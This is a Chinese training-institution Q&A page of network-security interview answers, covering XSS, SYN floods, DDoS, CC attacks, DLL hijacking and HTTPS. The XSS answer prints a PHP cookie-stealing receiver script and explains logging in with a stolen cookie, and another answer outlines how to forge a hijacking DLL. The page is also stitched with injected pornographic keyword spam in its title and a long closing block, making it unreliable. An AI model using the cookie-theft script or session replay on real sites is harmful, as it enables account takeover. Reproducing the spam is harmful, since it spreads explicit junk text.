国产91精品露脸国语对白-国产91精品系列在线观看-国产91精品一区-国产91精品一区二区-精品视频免费看-精品视频免费观看

千鋒教育-做有情懷、有良心、有品質的職業教育機構

當前位置:首頁  >  IT問答庫  >  網絡安全培訓課程

【搞定網絡協議】之網絡安全面試題

發布:網絡安全 2022-03-09 17:48

【搞定網絡協議】之網絡安全面試題

推薦答案

  在面試時,網絡安全也會被經常問到,至少要知道常見的攻擊,以及防御措施。在這里 Mark 下,不做深入分析。

網絡安全

  對稱加密和非對稱加密

  對稱加密:加解密用同一密鑰,密鑰維護復雜 n(n-1)/2,不適合互聯網傳輸密鑰,加解密效率高。應用于加密數據。

  非對稱加密:公鑰推不出私鑰,每個用戶一個非對稱密鑰對就可以,適合于互聯網傳輸公鑰,但是加密效率低,應用于數字簽名及加密。

  什么是同源策略?

  為了防止不同域在用戶瀏覽器中彼此干擾,瀏覽器對從不同來源(域)收到的內容進行隔離。瀏覽器不允許任何舊有腳本訪問一個站點的 cookie,否則,會話容易被劫持。只有發布 cookie 的站點能夠訪問這些 cookie,只有通過該站點返回的頁面所包含或加載的 JavaScript 才能訪問 cookie。

  cookie 存在哪里?可以打開嗎?

  C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies工具--文件夾選項--查看--將隱藏被保護的文件的對勾去掉就會看到 cookies 文件夾。

  xss 如何盜取 cookie?

  攻擊者代碼:

  .

  .$cookie=$_GET['cookie'];.

  .$time=date('Y-m-d g:i:s');..$referer=getenv('HTTP_REFERER');.

  .$cookietxt=fopen('cookie.txt','a');.

  .fwrite($cookietxt,"time:".$time." cookie:".$cookie."referer:".$referer.""); 注意雙引號,容易出錯.

  .fclose($cookietxt);.

  .?>.腳本端:..獲取到 cookie 后,用 firebug 找到 cookie,新建 cookie加入 cookie,用 referer 來提交,無需輸入帳號密碼直接登錄進去!

  xss 有 cookie 一定可以無用戶名密碼登錄嗎?

  基本可以。因為把 cookie 的值給瀏覽器,瀏覽器去訪問頁面會用已有的cookie 去訪問,如果 cookie 有效,就會直接進去。

  xss 如何防御?

  1. 對前端輸入做過濾和編碼:

  比如只允許輸入指定類型的字符,比如電話號格式,注冊用戶名限制等,輸入檢查需要在服務器端完成,在前端完成的限制是容易繞過的;對特殊字符進行過濾和轉義;

  2. 對輸出做過濾和編碼:在變量值輸出到前端的 HTML 時進行編碼和轉義;

  3. 給關鍵 cookie 使用 http-only。

  SYN 攻擊原理

  SYN 攻擊屬于 DOS 攻擊的一種,它利用 TCP 協議缺陷,通過發送大量的半連接請求,耗費 CPU 和內存資源。

  SYN 攻擊除了能影響主機外,還可以危害路由器、防火墻等網絡系統,事實上 SYN 攻擊并不管目標是什么系統,只要這些系統打開 TCP 服務就可以實施。服務器接收到連接請求(SYN=1),將此信息加入未連接隊列,并發送請求包給客戶(syn=k,ack=j+1),此時進入 SYN_RECV 狀態。當服務器未收到客戶端的確認包時,重發請求包,一直到超時,才將此條目從未連接隊列刪除。配合 IP 欺騙,SYN 攻擊能達到很好的效果,通常,客戶端在短時間內偽造大量不存在的 IP 地址,向服務器不斷地發送 syn 包,服務器回復確認包,并等待客戶的確認,由于源地址是不存在的,服務器需要不斷的重發直至超時,這些偽造的 SYN 包將長時間占用未連接隊列,正常的 SYN 請求被丟棄,目標系統運行緩慢,嚴重者引起網絡堵塞甚至系統癱瘓。

  什么是網絡釣魚?

  網絡釣魚是通過大量發送聲稱來自于銀行或其他知名機構的欺騙性垃圾郵件,意圖引誘收信人給出敏感信息(如用戶名、口令、帳號 ID 、ATMPIN 碼或信用卡詳細信息)的一種攻擊方式。最典型的網絡釣魚攻擊將收信人引誘到一個通過精心設計與目標組織的網站非常相似的釣魚網站上,并獲取收信人在此網站上輸入的個人敏感信息,通常這個攻擊過程不會讓受害者警覺。它常常導引用戶到 URL 與接口外觀與真正網站幾無二致的假冒網站輸入個人數據。就算使用強式加密的 SSL 服務器認證,要偵測網站是否仿冒實際上仍很困難。網釣是一種利用社會工程技術來愚弄用戶的實例。它憑恃的是現行網絡安全技術的低親和度。DDOS

  分布式拒絕服務(DDoS:Distributed Denial ofService)攻擊指借助于客戶/服務器技術,將多個計算機聯合起來作為攻擊平臺,對一個或多個目標發動DDoS 攻擊,從而成倍地提高拒絕服務攻擊的威力。

  通常,攻擊者使用一個偷竊帳號將 DDoS 主控程序安裝在一個計算機上,在一個設定的時間主控程序將與大量代理程序通訊,代理程序已經被安裝在網絡上的許多計算機上。代理程序收到指令時就發動攻擊。利用客戶/服務器技術,主控程序能在幾秒鐘內激活成百上千次代理程序的運行。

  什么是 CC 攻擊?

  這個也是知道一些,知道他是 DDos 的變種,正常請求偽造,服務器資源耗盡,最終還是看看百科答案吧:CC 攻擊是 DDOS(分布式拒絕服務)的一種,相比其它的 DDOS 攻擊 CC 似乎更有技術含量一些。這種攻擊你見不到真實源 IP,見不到特別大的異常流量,但造成服務器無法進行正常連接。CC 攻擊的原理就是攻擊者控制某些主機不停地發大量數據包給對方服務器造成服務器資源耗盡,一直到宕機崩潰。

  CC 主要是用來攻擊頁面的,每個人都有這樣的體驗:當一個網頁訪問的人數特別多的時候,打開網頁就慢了,CC 就是模擬多個用戶(多少線程就是多少用戶)不停地進行訪問那些需要大量數據操作(就是需要大量 CPU 時間)的頁面,造成服務器資源的浪費,CPU 長時間處于 100%,永遠都有處理不完的連接直至就網絡擁塞,正常的訪問被中止。

  Web 服務器被入侵后,怎樣進行排查?

  最簡單就是查看下 web 服務器日志 ,看看有沒有異常端口開放,使用安全狗等服務器安全軟件清掃

  dll 文件是什么意思,有什么用?

  DLL(Dynamic Link Library)文件,即動態鏈接庫,也有人稱作應用程序拓展。Windows 應用程序中,實行了模塊化設計,也就是說并不是每個應用程序都編寫完所有的功能代碼,而是在運行過程中調用相應功能的 DLL,不需運行的功能就不調用,所以大大加快了程序的加載速度和效率,其他應用程序也可以調用相關的 DLL,這樣也有利于促進代碼重用以及內存使用效率,減少了資源占用,而且程序更新時也只要更新相關的 DLL 就可以了。

  要注意的是,有些病毒也會偽裝成 DLL 文件,并替換系統的 DLL 文件,需要我們防范。

  DLL 劫持原理由于輸入表中只包含 DLL 名而沒有它的路徑名,因此加載程序必須在磁盤上搜索 DLL 文件。

  首先會嘗試從當前程序所在的目錄加載 DLL,如果沒找到,則在 Windows 系統目錄中查找,最后是在環境變量中列出的各個目錄下查找。利用這個特點,先偽造一個系統同名的 DLL,提供同樣的輸出表,每個輸出函數轉向真正的系統 DLL。程序調用系統 DLL 時會先調用當前目錄下偽造的 DLL,完成相關功能后,再跳到系統 DLL 同名函數里執行。這個過程用個形象的詞來描述就是系統 DLL 被劫持(hijack)了。

  偽造的 dll 制作好后,放到程序當前目錄下,這樣當原程序調用原函數時就調用了偽造的 dll 的同名函數,進入劫持 DLL 的代碼,處理完畢后,再調用原DLL 此函數。如何防止 DLL 劫持DLL 劫持利用系統未知 DLL 的搜索路徑方式,使得程序加載當前目錄下的系統同名 DLL。所以可以告訴系統 DLL 的位置,改變加載系統 DLL 的順序不是當前目錄,而是直接到系統目錄下查找。

  Https 的作用

  內容加密建立一個信息安全通道,來保證數據傳輸的安全;

  身份認證確認網站的真實性

  數據完整性防止內容被第三方冒充或者篡改HTTPS 和 HTTP 的區別:https 協議需要到 CA 申請證書。http 是超文本傳輸協議,信息是明文傳輸;https 則是具有安全性的 ssl 加密傳輸協議。http 和 https 使用的是完全不同的連接方式,用的端口也不一樣,前者是 80,后者是 443。http 的連接很簡單,是無狀態的;HTTPS 協議是由 SSL+HTTP 協議構建的可進行加密傳輸、身份認證的網絡協議,比 http 協議安全。

最新問答資訊

01 unity用什么編程語言?unity學習難度大嗎

學習 unity 語言
6020 人關注

02 python容易學嗎?學好python有什么好處?

學習 python 工作 培訓
5389 人關注

03 html是什么語言?html學習難嗎?

學習 html 語言 可以
5062 人關注

04 c語言難學嗎?c語言學好要多久?

語言 技術 學習
4733 人關注

06 學好平面設計要多久?報速成班靠譜嗎?

平面 設計 學習 時間
4238 人關注

相關問題

Rootkit是什么意思

  Rootkit是一種特殊類型的malware(惡意軟件)。Rootkit之所...

【搞定網絡協議】之網絡安全面試題

為了防止不同域在用戶瀏覽器中彼此干擾,瀏覽器對從不同來源(域)...

網絡安全全套教程視頻在線觀看

網絡安全是一個企業中非常重要的一環,如果你的網絡出現了問題會...

千鋒教育重磅出擊 網絡安全課程全新上線

近日,中國互聯網IT領袖峰會召開,會上對中國互聯網IT產業做了新...

網絡安全培訓內容有哪些

自從黨的十八大以來,國家越來越重視關于網絡安全的問題。畢竟伴...

北京網絡安全培訓課程要學習什么內容

隨著網絡安全問題上升至國家層面以及企業對于網絡安全人才需求迫...

測一測
你知道多少IT梗

国产成人精品综合在线观看| 久久综合亚洲色HEZYO社区| 日韩在线 | 中文| XXXXHDTEEN欧美内射| 欧美狂野乱码一二三四区| 99精品国产一区二区三区| 欧美叉叉叉BBB网站| 99国精产品W灬源码1688钻| 女人高潮特级毛片| JAPANESE 大战黑人| 人妻精品久久一区二区av| ZOOM与人性ZOOM我放弃播放器| 欧洲肉欲K8播放毛片| 白丝?扒腿自慰爽出白浆| 日本一品和二品区别| 荡公乱妇第1章方情95| 少妇午夜福利水多多| 国产精品精华液网站 | 国产成人精品午夜福利| 凸凹人妻人人澡人人添医| 国产情侣露脸高清在线| 亚洲A级成人片在线观看| 精品97国产免费人成视频| 亚洲另类自拍丝袜第五页| 久久婷婷五月综合色国产香蕉 | 中文字幕AV一区中文字幕天堂 | 亚洲AV无码一区二区三区天堂| 黑人大战中国AV女叫惨了| 亚洲精品无码av中文字幕电影网站| 久久精品人成免费| 中文无码久久精品| 欧美最婬乱婬爆婬牲视| 岛国精品一区免费视频在线观看| 卫生间被教官做好爽HH视频| 国产做国产爱免费视频| 亚洲熟妇色XXXXXX爽| 免费观看亚洲人成网站| А√天堂资源最新版在线官网| 少妇伦子伦精品无吗| 国产日韩未满十八禁止观看| 亚洲另类在线视频| 免费AV网站在线观看| ZOZ○ZO女人和另类ZOZ0| 天堂中文在线最新版WWW| 好男人好资源在线影视官网 | 国产成人AⅤ片在线观看免费| 香蕉久久一区二区不卡无毒影院 | 中英文字幕乱码英文正常| 趴下老子要从后面CAO你| 国产69精品久久久久观看软件 | 国产日产欧产精品精品首页 | 蜜桃av中文字幕在线| WWW.一区二区三区在线 || 少妇与子乱A级全毛片| 韩漫漫画登录页面入口弹窗秋蝉张| 亚洲中文字幕久久精品无码VA| 欧美精产国品一二三类产品特点 | 亚洲AV实录无码成人精品电影| 久久久久亚州AⅤ无码专区首| AV免费网站在线观看| 熟女CHACHACHA性少妇| 加勒比色综合久久久久久久久| 中国少妇XXXX做受| 撒尿BBWBBW| 韩国av一区二区| 中文字幕人妻色偷偷久久| 日产精品久久久一区二区| 国产手机在线ΑⅤ片无码观看| 亚洲最刺激成人无码| 翘臀后进少妇大白嫩屁股| 国产精品视频一区国模私拍 | AV无码免费无禁网站| 水蜜桃AV无码一区二区| 精品人妻少妇一区二区三区在线| 24小时在线看免费观看直播| 色偷偷偷久久伊人大杳蕉| 好男人视频在线观看| 50岁熟妇大白屁股真爽| 色婷婷五月色综合AⅤ小说| 激情偷乱人伦小说免费看| 20厘米的粗黑巨物挺进| 天堂AⅤ无码一区二区三区| 精品人妻少妇一区二区三区| CHINESE熟女老女人HD| 无码熟妇人妻AV在线影片| 久久毛片免费看一区二区三区 | 村长用力挺进她的花苞啥电视| 性饥渴老妇XXXⅩOOO| 免费无码不卡视频在线观看| 国产AV成人一区二区三区高清| 亚洲熟妇少妇任你躁在线观看| 人妻 丝袜美腿 中文字幕| 国产无线乱码一区二三区| 中文字幕在线播放| 糖心VLOG肉丝库水柚子猫| 久久久久久AV无码免费看大片| 被老头侵犯的人妻| 亚洲大色堂人在线无码| 欧洲熟妇色XXXXX老妇| 国产一区二区三区无码免费 | 手机在线看永久AV片免费高潮| 久久99精品久久久久久清纯| 草莓影视在线观看视频 | 国产未成女YOUNV仙踪林| 主人地下室惩罚骚奴的法律后果| 婷婷综合久久中文字幕蜜桃三电影| 久久久久精品久久九九| 丁香五月亚洲综合深深爱| 野花高清在线观看免费官网中文版| 日日摸日日碰夜夜爽暖暖视频| 久久国内精品一区二区三区| 黑人巨大无码中文字幕无码| 又湿又紧又大又爽A视频| 国产成人精品日本亚洲语音| 亚洲熟妇丰满色XXXXX欧美| 日本人妻丰满熟妇久久久久久不卡| 狠狠色丁香久久综合婷婷| ZOOM与人性ZOOM怎么同步| 亚洲AV永久综合在线观看尤物| 欧美亚洲精品中文字幕乱码| 好硬好大好爽18禁免费看男男 | 人妻少妇 少妇人妻第一页| 国内精品宾馆在线精品酒店| YW尤物AV无码国产在线看| 亚洲国产精品无码久久久动漫| 日本XXXX裸体XXXX在线| 精品人妻无码专区中文字幕| 成人AV片在线观看免费| 一本一本久久A久久综合精品蜜桃 一本一本久久A久久综合精品 | 国产亚洲成AⅤ人片在线观看| AV无码久久久精品免费| 亚洲AV中文无码字幕色 | 日韩AV无码免费播放| 久久久久久久精品免费| 国产成人无码AV麻豆| 400部精品国偷自产在线| 亚洲AV永久无码精品主页丝瓜| 日本亚洲色大成网站WWW久久| 久久夜色精品国产嚕嚕亚洲AV| 国产麻豆放荡AV剧情演绎| AV无码爆乳护士在线播放| 亚洲另类激情综合偷自拍图片| 色久综合网精品一区二区| 免费精品一区二区三区第35 | 九九精品无码专区免费| 国产A√精品区二区三区四区| 中文字幕AV无码一区二区三区电| 亚洲AV无码一区二区三区国产| 日本三级欧美三级人妇视频黑白配| 久久国产精品99精品国产| 精品无码国产自产野外拍在线 | 饥渴人妻被快递员玩弄的视频| 成人爽A毛片在线视频| 伊人久久东京AV| 亚洲AV蜜乳永久www| 日韩成人无码AV| 美国一面亲上边一面膜下边| 狠狠人妻熟妇Av又粗又大| 国产AV日韩A∨亚洲AV电影 | 啊灬啊灬啊灬快灬高潮了视频网站| 亚洲最大AV网站在线观看| 性中国VODAFONEWIFI| 日本WV一本一道久久香蕉| 没有被爱过的女人| 饥渴的少妇2中文字幕| 国产成人无码AV一区二区 | 夜夜爽夜夜叫夜夜高潮漏水| 无码少妇一区二区三区视频| 日韩AⅤ无码大片无码片| 麻花豆传媒剧国产MV网站入口| 好爽好大再深点高H免费观看| 国产成 人 综合 亚洲专区| FREESEXVIDEOS性亚| 宅男66LU国产在线观看| 亚洲精品中文字幕久久久久下载| 无码人妻久久1区2区3区| 日韩精品人妻系列无码专区| 女人被狂躁c到高潮视频| 久久人妻蜜桃一区二区三区| 皇叔撞着小公主的小说叫什么| 国产精品国三级国产AV| 大屁股熟女一区二区三区| 曰韩少妇内射免费播放| 亚洲爆乳精品无码一区二区三区 | 娇喘潮喷抽搐高潮在线观看视频 | 亚洲精品无码寂寞少妇AV| 无码熟妇人妻AV在线网站| 少妇把腿扒开让我添69动态图| 人妻少妇中文字幕乱码| 妺妺窝人体色WWW聚色窝仙踪 | 久久久久久亚洲综合影院 | 饥渴人妻被快递员玩弄的视频| 国产精品国色综合久久| 丰满少妇被猛烈进入| きょこんきょうしゃ在线| 18禁裸男晨勃露J毛免费观看| 又大又粗欧美成人网站| 亚洲中文无码线在线观看 | 欧美成人精品A∨在线观看| 美女被强奸到高潮在线|